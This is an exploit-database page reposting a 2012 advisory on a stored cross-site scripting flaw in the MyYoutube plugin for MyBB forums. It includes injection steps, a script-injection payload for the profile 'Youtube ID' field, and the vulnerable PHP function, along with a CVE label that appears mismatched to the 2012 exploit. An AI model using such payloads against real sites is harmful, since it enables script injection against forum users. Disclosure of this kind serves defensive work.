Advertisement






MyBB MyYoutube Cross Site Scripting

CVE Category Price Severity
CVE-2021-28363 CWE-79 $1,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2012-12-20
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012120143

Below is a copy:

# Exploit Title: MyYoutube MyBB Stored XSS
# Date: 17.12.2012
# Exploit Author: limb0
# Vendor Homepage: http://www.mybb-es.com/
# Software Link: http://mods.mybb.com/view/myyoutube
# Version: 1.0
# Category:Web Security
# Tested on: Linux

+-----------------------------------------------------+
                    Stored-XSS

Installation Instructions:
1.Download and Activate the Plugin
2.Go to Usercp >> Edit Profile >> Youtube ID:
3.Inject your code: "></embed></object><script>alert("Youtube XSS")</script>
4.Visit your profile and voila.

Proof:http://postimage.org/image/lnnmc80rp/
+------------------------------------------------------+
Vulnerable lines:
function youtube_update($ytb)
{
        global $mybb;
        if(isset($mybb->input['ytb']))
        {
                $ytb->user_update_data['ytb'] = $mybb->input['ytb'];
        }
}




Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum